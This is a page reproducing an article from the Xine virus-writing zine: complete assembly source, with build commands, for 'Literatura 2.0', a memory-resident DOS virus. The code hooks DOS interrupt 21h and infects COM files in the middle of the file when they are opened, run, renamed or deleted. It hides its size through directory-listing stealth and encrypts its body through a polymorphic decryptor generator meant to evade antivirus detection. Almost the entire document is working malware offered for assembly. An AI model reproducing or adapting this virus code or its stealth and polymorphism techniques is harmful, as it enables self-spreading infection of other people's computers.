Copy Link
Add to Bookmark
Report
Xine - issue #3 - Phile 208
/-----------------------------\
| Xine - issue #3 - Phile 208 |
\-----------------------------/
Comment %
Ü
Û Û V I R U S Û
Û ßÜÛÜ ÜÜ Ü Ü ÜÜ ÜÛÜ Ü Ü ÜÜ
Û Û Û ÛÜÜß Ûß Û Û Û Û Û Ûß Û Û ÜßßÜ ÜßßÜ
Û Û Û Û Û Û Û Û Û Û Û Û Û Üß Û Û
ßßß ß ß ßßß ß ßßßß ß ßß ß ßßßß ßßß ß ßß
TSR size stealth polymorphic COM midfile fast infector
Programmed by Int13h/iKx in Paraguay, South America
Original bytes of the hoste are stored in an encrypted form at EOF.
Virus code is in a random file position, a polymorphic header gives
control to the decryptor generated by the polymorphic engine.
Greets to Dark Avenger, who was the piooner in midfile infection,
with his great Commander Bomber. Also greetz to all my IRC-friends.
tasm litera2 /m3
tlink litera2 /t
%
.Model Tiny
.Code
Org 100h
Jumps
Heap equ (offset Final-offset OpaLaVya)
Largor equ (offset OpaLaVya-offset Literatura)
Parrafos1 equ ((Largor+Heap+15)/16)+1
Parrafos2 equ ((Largor+Heap+15)/16)
LDecryptor equ (offset encriptora_1-offset instruccion_2)
LITERATURA:
Basura db 33d dup(090h) ; Space where we will generate
Modificar: ; the polymorphic decryptor
int 3
call Delta
Delta: pop bp
sub bp,offset Delta
mov ax,'i1'
int 21h
cmp ax,'3!'
je LiteraturaIsAlreadySuckingMemory
mov ah,30h
int 21h
cmp al,7
jae LiteraturaIsAlreadySuckingMemory
mov ax,3521h
int 21h
mov word ptr [bp+Vieja21h],bx
mov word ptr [bp+Vieja21h+2],es
mov ax,ds
dec ax
mov es,ax
mov ax,es:[3]
sub ax,Parrafos1
xchg bx,ax
push ds
pop es
mov ah,4ah
int 21h
mov ah,48h
mov bx,Parrafos2
int 21h
dec ax
mov es,ax
mov word ptr es:[1],8
inc ax
mov es,ax
xor di,di
push cs
pop ds
lea si,[bp+offset Literatura]
mov cx,Largor
rep movsb
push es
pop ds
mov ax,2521h
mov dx,(offset Literatura21h-100h)
int 21h
LiteraturaIsAlreadySuckingMemory:
push cs cs
pop ds es
cld
lea si,[bp+offset Primitivos]
mov di,100h
push di
mov cx,15
rep movsw
lea si,[bp+offset Copier]
mov di,06ch
mov ax,di
mov cx,5
repe movsw
movsb
db 0bfh
Reales dw 0
add di,100h
mov cx,Largor
Descifrar_Bytes_Originales:
dw 3580h
Llave db 0
inc di
loop Descifrar_Bytes_Originales
mov cx,Largor
db 0beh
Origen dw 0
add si,100h
db 0bfh
Destino dw 0
add di,100h
xor bx,bx
xor dx,dx
sub bp,bp
jmp ax
Copier: repe movsb
xor si,si
sub di,di
xor ax,ax
sub cx,cx
ret
db " [LiTeRaTuRa 2.0 by Int13h] - MadE in ParaguaY "
Metodo1:db 0e9h
Despla1 dw 666
Metodo2:db 0bbh
Despla2 dw 666
push bx
ret
Metodo3:db 0e8h
Despla3 dw 666
Metodo4:db 0bbh
Despla4 dw 666
jmp bx
Metodo5:db 0bbh
Despla5 dw 666
call bx
Metodo6:push cs
db 0bbh
Despla6 dw 666
push bx
retf
STEALTH1:
xor ah,0bah
pushf
call dword ptr cs:[Vieja21h-100h]
test al,al
jnz Erebo
push ax bx es
mov ah,51h
int 21h
mov es,bx
cmp bx,es:[16h]
jne Fuera
mov bx,dx
mov al,[bx]
push ax
mov ah,2fh
int 21h
pop ax
inc al
jnz FCBComun
add bx,7
FCBComun:
mov al,byte ptr es:[bx+17h]
and al,00011111b
cmp al,00011110b
jne Fuera
cmp word ptr es:[bx+1dh],Largor
ja Sustraer
cmp word ptr es:[bx+1fh],0
je Fuera
Sustraer:sub word ptr es:[bx+1dh],Largor
Fuera: pop es bx ax
Erebo: retf 2
LITERATURA21h:
cmp ax,'i1' ; Residence Checking
je Chequeo
xor ah,0bah
cmp ah,(03dh xor 0bah) ; File Opening?
je InfectFile
cmp ah,(04bh xor 0bah) ; Program loading?
je InfectFile
cmp ah,(11h xor 0bah) ; FCB find first
je Stealth1
cmp ah,(12h xor 0bah) ; FCB find next
je Stealth1
cmp ah,(4eh xor 0bah) ; DTA find first
je Stealth2
cmp ah,(4fh xor 0bah) ; DTA find next
je Stealth2
cmp ax,0d600h ; Extended Open
je InfectFile
cmp ah,(056h xor 0bah) ; Rename
je InfectFile
cmp ah,(041h xor 0bah) ; Delete
je InfectFile
cmp ah,(043h xor 0bah) ; Get/Set attributes
je InfectFile
cmp ax,08f21h ; Camuflar 3521h
je Ocultar21h_A
cmp ax,09f21h ; Camuflar 2521h
je Ocultar21h_B
xor ah,0bah
Interrupcion_21h:
db 0eah
Vieja21h dd 0
Chequeo:mov ax,'3!'
iret
OCULTAR21h_A:
xor ah,0bah
mov bx,word ptr cs:[(Vieja21h-100h)]
mov es,word ptr cs:[(Vieja21h-100h)+2]
iret
OCULTAR21h_B:
xor ah,0bah
mov word ptr cs:[(Vieja21h-100h)],dx
mov word ptr cs:[(Vieja21h-100h)+2],ds
iret
STEALTH2:
xor ah,0bah
pushf
call dword ptr cs:[Vieja21h-100h]
jc Infierno
pushf
push ax di es bx
mov ah,2fh
int 21h
mov ax,es:[bx+16h]
and al,00011111b
cmp al,00011110b
jne Paso
cmp word ptr es:[bx+1ah],Largor
jb Paso
sub word ptr es:[bx+1ah],Largor
Paso: pop bx es di ax
popf
Infierno:
retf 2
Primitivos db 30d dup(0c3h)
SoloPopear:
jmp PopIt
INFECTFILE:
xor ah,0bah
push ax bx cx dx si di ds es
cmp ax,6c00h
jne Apertura_Standard
cmp dx,0001
jne SoloPopear
mov dx,si
Apertura_Standard:
push dx ds
mov ax,3524h
int 21h
mov word ptr cs:[Real24h-100h],bx
mov word ptr cs:[(Real24h-100h)+2],es
push cs
pop ds
mov ax,2524h
mov dx,offset Handler24h-100h
int 21h
pop ds dx
push ds
pop es
cld
mov di,dx
mov cx,128
mov al,'.'
repne scasb
jne Popeo
mov ax,word ptr es:[di-3]
or ax,02020h
cmp ax,'dn'
je Popeo
xchg si,di
lodsw
or ax,2020h
cmp ax,'oc'
jne Popeo
lodsb
or al,20h
cmp al,'m'
jne Popeo
mov ax,3d02h
pushf
call dword ptr cs:[Vieja21h-100h]
jc Popeo
xchg bx,ax
mov ax,5700h
int 21h
mov word ptr cs:[(Hora-100h)],cx
mov word ptr cs:[(Fecha-100h)],dx
and cl,00011111b
cmp cl,00011110b
je Closeo
push cs cs
pop ds es
mov ah,03fh
mov dx,(offset Primitivos-100h)
mov cx,30
int 21h
mov si,dx
mov ax,[si]
add ah,al
cmp ah,167d
je Closeo
call PunteroFin
and dx,dx
jnz Closeo
cmp ax,60000d
ja Closeo
cmp ax,3000d
jbe Closeo
mov cx,ax
sub cx,(Largor+40)
call Obtener_Numero_Aleatorio
cmp ax,40
ja Okis
mov ax,666
Okis: sub ax,3
mov word ptr [Despla1-100h],ax
mov word ptr [Despla2-100h],ax
mov word ptr [Despla3-100h],ax
mov word ptr [Despla4-100h],ax
mov word ptr [Despla5-100h],ax
mov word ptr [Despla6-100h],ax
add ax,3
mov dx,ax
push dx
mov word ptr [Destino-100h],dx
xor cx,cx
mov ax,4200h
int 21h
mov ah,3fh
mov dx,offset Vafer-100h
mov cx,Largor
int 21h
call PunteroFin
mov word ptr [Reales-100h],ax
mov word ptr [Origen-100h],ax
in al,40h
or al,al
jnz NoCero
inc al
NoCero: mov byte ptr [Llave-100h],al
mov si,offset Vafer-100h
mov cx,Largor
Cifrar_Bytes_Originales:
xor byte ptr [si],al
inc si
loop Cifrar_Bytes_Originales
mov ah,40h
mov cx,Largor
mov dx,offset Vafer-100h
int 21h
call PunteroInicio
mov di,(offset Polymorphic_Header-100h)
mov cx,30
Generate_Garbage:
push cx
push di
mov cx,40
call Obtener_Numero_Aleatorio
mov si,(offset Opcodes_de_un_byte-100h)
add si,ax
pop di
movsb
pop cx
loop Generate_Garbage
mov cx,7
call Obtener_Numero_Aleatorio
call Generate_Polymorphic_Header
mov ah,40h
mov cx,30
mov dx,(offset Polymorphic_Header-100h)
int 21h
pop dx
push dx
xor cx,cx
mov ax,4200h
int 21h
mov si,offset Modificar-100h
mov di,offset Vafer-100h
mov cx,Largor-33d
pop bp
add bp,100h
push bx
call Ygramul
pop bx
mov ah,40h
mov dx,offset Vafer-100h
int 21h
db 0b9h
Hora dw 0
and cl,11100000b
or cl,00011110b
db 0bah
Fecha dw 0
mov ax,5701h
int 21h
Closeo: mov ah,3eh
int 21h
Popeo: push cs
pop ds
lds dword ptr dx,[Real24h-100h]
mov ax,2524h
int 21h
PopIt: pop es ds di si dx cx bx ax
jmp Interrupcion_21h
PunteroInicio:
mov ax,04200h
jmp short Mover
PunteroFin:
mov ax,04202h
Mover: xor cx,cx
cwd
int 21h
ret
Handler24h:
mov al,03
iret
Generate_Polymorphic_Header:
mov byte ptr [Modificar-100h],0cch
cmp ax,2
je UsarMetodo2
cmp ax,3
je UsarMetodo3
cmp ax,4
je UsarMetodo4
cmp ax,5
je UsarMetodo5
cmp ax,6
je UsarMetodo6
call Arreglo_General
mov si,offset Metodo1-100h
movsw
movsb
ret
UsarMetodo2:
call Arreglo_General
mov si,offset Metodo2-100h
movsw
movsw
movsb
ret
UsarMetodo3:
call Arreglo_General
mov byte ptr [Modificar-100h],05dh
mov si,offset Metodo3-100h
movsw
movsb
ret
UsarMetodo4:
call Arreglo_General
mov si,offset Metodo4-100h
movsw
movsw
movsb
ret
UsarMetodo5:
call Arreglo_General
mov byte ptr [Modificar-100h],058h
mov si,offset Metodo5-100h
movsw
movsw
movsb
ret
UsarMetodo6:
call Arreglo_General
mov si,offset Metodo6-100h
movsw
movsw
movsw
ret
Arreglo_General:
mov cx,23
call Obtener_Numero_Aleatorio
sub word ptr [Despla1-100h],ax
add word ptr [Despla2-100h],103h
sub word ptr [Despla3-100h],ax
add word ptr [Despla4-100h],103h
add word ptr [Despla5-100h],103h
add word ptr [Despla6-100h],103h
mov di,offset Polymorphic_Header-100h
add di,ax
ret
; Cheesy engine used to generate random fixed-size decryptors
; Uses xor/sub/add/not/neg/ror/rol/inc/dec for enc/decryption
Ygramul:
mov word ptr [LiteCX1-100h],cx
mov word ptr [LiteCX2-100h],cx
mov word ptr [LiteBP-100h],bp
mov word ptr [LiteES-100h],es
mov word ptr [LiteSI-100h],si
mov word ptr [LiteDI-100h],di
mov si,offset ClaveEnc_1-100h
mov di,offset ClaveDec_1-100h
in ax,40h
test al,al
jnz Pasamos_al
inc al
Pasamos_al:
and ah,ah
jnz Pasamos_ah
dec ah
Pasamos_ah:
mov byte ptr [si+3],ah
mov byte ptr [di+3],ah
mov byte ptr [si],al
mov byte ptr [di],al
in al,40h
or al,al
jnz Listo
inc al
Listo: mov byte ptr [si+6],al
mov byte ptr [di+6],al
push cs
pop es
mov di,offset Encriptora_4-100h+2
mov bx,offset Opcodes_de_un_byte-100h
mov si,6
Rellenar:
mov cx,17
call Obtener_Numero_Aleatorio
xlat
stosb
inc di
inc di
dec si
jnz Rellenar
mov cx,127
call obtener_numero_aleatorio
sub word ptr [LiteBP-100h],ax
mov byte ptr [Desplazamiento1-100h],al
mov byte ptr [Desplazamiento2-100h],al
mov cx,4
call Obtener_Numero_Aleatorio
mov byte ptr [Indice-100h],al
mov si,offset Instruccion_2-100h
mov di,offset Instruccion_3-100h+2
mov bp,offset Instruccion_4-100h
cmp al,1
jnz No_fue_Uno
mov byte ptr [si],0beh
mov byte ptr [di],07ch
mov byte ptr ds:[bp+2],07ch
mov byte ptr ds:[bp+4],046h
jmp short Seleccionar_Contador
No_fue_Uno:
cmp al,2
jnz No_fue_Dos
mov byte ptr [si],0bfh
mov byte ptr [di],07dh
mov byte ptr ds:[bp+2],07dh
mov byte ptr ds:[bp+4],047h
jmp short Seleccionar_Contador
No_fue_Dos:
cmp al,3
jnz Fue_Cuatro
mov byte ptr [si],0bdh
mov byte ptr [di],07eh
mov byte ptr ds:[bp+2],07eh
mov byte ptr ds:[bp+4],045h
jmp short Seleccionar_Contador
Fue_Cuatro:
mov byte ptr [si],0bbh
mov byte ptr [di],07fh
mov byte ptr ds:[bp+2],07fh
mov byte ptr ds:[bp+4],043h
Seleccionar_Contador:
mov cx,6
call Obtener_Numero_Aleatorio
mov ah,byte ptr [Indice-100h]
cmp ah,al
je Seleccionar_Contador
mov byte ptr [Contador-100h],al
mov si,offset Instruccion_1-100h
mov di,offset Instruccion_6-100h
cmp al,1
jnz Uno_no_fue
mov byte ptr [si],0beh
mov byte ptr [di],04eh
jmp short Mutar_registros_de_trabajo
Uno_no_fue:
cmp al,2
jne Dos_no_fue
mov byte ptr [si],0bfh
mov byte ptr [di],04fh
jmp short Mutar_registros_de_trabajo
Dos_no_fue:
cmp al,3
jne Tres_no_fue
mov byte ptr [si],0bdh
mov byte ptr [di],04dh
jmp short Mutar_registros_de_trabajo
Tres_no_fue:
cmp al,4
jne Cuatro_no_fue
mov byte ptr [si],0bbh
mov byte ptr [di],04bh
jmp short Mutar_registros_de_trabajo
Cuatro_no_fue:
cmp al,5
jne Seis_fue
mov byte ptr [si],0b9h
mov byte ptr [di],049h
jmp short Mutar_registros_de_trabajo
Seis_fue:
mov byte ptr [si],0bah
mov byte ptr [di],04ah
Mutar_registros_de_Trabajo:
mov cx,6
call Obtener_Numero_Aleatorio
mov byte ptr [Carga-100h],al
mov cl,byte ptr [Indice-100h]
mov ch,byte ptr [Contador-100h]
cmp al,2
ja No_CX
cmp ch,5
je Mutar_registros_de_Trabajo
jmp short Almacenar
No_CX: cmp al,4
ja No_DX
cmp ch,6
je Mutar_registros_de_Trabajo
jmp short Almacenar
No_DX: cmp cl,4
je Mutar_registros_de_Trabajo
cmp ch,4
je Mutar_registros_de_Trabajo
Almacenar:
and byte ptr [Instruccion_3-100h+2],047h
and byte ptr [Instruccion_4-100h+2],047h
cmp al,1
jnz Uno_no_ha_sido
mov al,00101000b
jmp short ORearlo
Uno_no_ha_sido:
cmp al,2
jne Dos_no_ha_sido
mov al,00001000b
jmp short ORearlo
Dos_no_ha_sido:
cmp al,3
jne Tres_no_ha_sido
mov al,00110000b
jmp short ORearlo
Tres_no_ha_sido:
cmp al,4
jne Cuatro_no_ha_sido
mov al,00010000b
jmp short ORearlo
Cuatro_no_ha_sido:
cmp al,5
jne Fue_Six
mov al,00111000b
jmp short ORearlo
Fue_Six:mov al,00011000b
ORearlo:mov byte ptr [Orear-100h],al
or byte ptr [Instruccion_3-100h+2],al
or byte ptr [Instruccion_4-100h+2],al
mov di,offset Encriptar-100h
mov ax,15
call Llenar_con_basura
mov di,offset Buffer-100h
mov ax,15
call Llenar_con_basura
mov cx,5
call Obtener_Numero_Aleatorio
mov byte ptr [Cantidad-100h],al
mov bp,ax
mov di,offset Encriptar-100h
xor dx,dx
Seleccionar_Instrucciones:
mov si,offset Encriptora_1-100h-3
mov cx,9
call Obtener_Numero_Aleatorio
mov cl,3
mul cl
add si,ax
movsw
movsb
push si
push di
add si,24
mov di,offset Buffer-100h
add di,dx
add dx,3
movsw
movsb
pop di
pop si
dec bp
jnz Seleccionar_Instrucciones
mov bp,3
mov si,offset Encriptar-100h
mov cx,5
Inversor:
mov di,offset Instruccion_4-100h
sub di,bp
add bp,3
movsw
movsb
loop Inversor
mov si,offset Buffer-100h
mov di,offset Encriptar-100h
mov cx,15
rep movsb
mov si,offset Instruccion_4-100h-2
mov al,byte ptr [Orear-100h]
mov cl,3
shr al,cl
xor cx,cx
mov cl,byte ptr [Cantidad-100h]
Proceder:
and byte ptr [si],11111000b
or byte ptr [si],al
sub si,3
loop Proceder
db 0bfh
LiteDI dw 0
db 0b8h
LiteES dw 0
mov es,ax
db 0bah
LiteCX1 dw 0
mov cx,LDecryptor
add word ptr [LiteBP-100h],cx
push cx
mov si,offset Instruccion_2-100h
rep movsb
pop cx
add cx,dx
db 0beh
LiteSI dw 0
Realizar_la_encripcion:
mov bh,byte ptr ds:[si]
Encriptar db 15 dup(0fbh)
mov byte ptr es:[di],bh
inc si
inc di
dec dx
jnz Realizar_la_encripcion
ret
Instruccion_2: db 0beh
LiteBP dw 0
Instruccion_1: db 0bah
LiteCX2 dw 0
Instruccion_3: db 02eh,08ah,07ch
Desplazamiento1 db 0
Desencriptar db 15 dup(0f8h)
Instruccion_4: db 02eh,088h,07ch
Desplazamiento2 db 0
Instruccion_5: inc si
Instruccion_6: dec dx
jnz Instruccion_3
Encriptora_1: db 080h,0c7h
ClaveEnc_1 db 0
Encriptora_2: db 080h,0efh
ClaveEnc_2 db 0
Encriptora_3: db 080h,0f7h
ClaveEnc_3 db 0
Encriptora_4: inc bh
int 3
Encriptora_5: dec bh
sti
Encriptora_6: not bh
stc
Encriptora_7: neg bh
cld
Encriptora_8: ror bh,1
cmc
Encriptora_9: rol bh,1
nop
Desencriptora_1: db 080h,0efh
ClaveDec_1 db 0
Desencriptora_2: db 080h,0c7h
ClaveDec_2 db 0
Desencriptora_3: db 080h,0f7h
ClaveDec_3 db 0
Desencriptora_4: dec bh
nop
Desencriptora_5: inc bh
stc
Desencriptora_6: not bh
clc
Desencriptora_7: neg bh
sti
Desencriptora_8: rol bh,1
cmc
Desencriptora_9: ror bh,1
Opcodes_de_un_byte:
cld
db 090h,0cch,0fch,0fbh,0f8h,0f9h,0f5h,037h,02fh,027h
db 03fh,0ceh,098h,09fh,09bh,040h,048h,043h,04bh,041h
db 049h,042h,04ah,046h,04eh,047h,04fh,045h,04dh,093h
db 099h,091h,092h,095h,096h,097h,0ech,0edh,0d7h
Obtener_Numero_Aleatorio:
push dx
push di
in ax,40h
mov dx,106
mul dx
add ax,1283
mov di,6075
adc dx,0
div di
mov ax,dx
mul cx
div di
pop di
pop dx
inc ax
ret
Llenar_con_basura:
mov bp,ax
Repetir:mov si,offset Opcodes_de_un_byte-100h
mov cx,17
call Obtener_Numero_Aleatorio
add si,ax
movsb
dec bp
jnz Repetir
ret
Cantidad db 0
Orear db 0
Buffer:
Indice db 0
Contador db 0
Carga db 0
db 13 dup(90h)
OpaLaVya:
Real24h dd 0
Polymorphic_Header db 30 dup(0)
Vafer db Largor dup(0)
Final label byte
End LITERATURA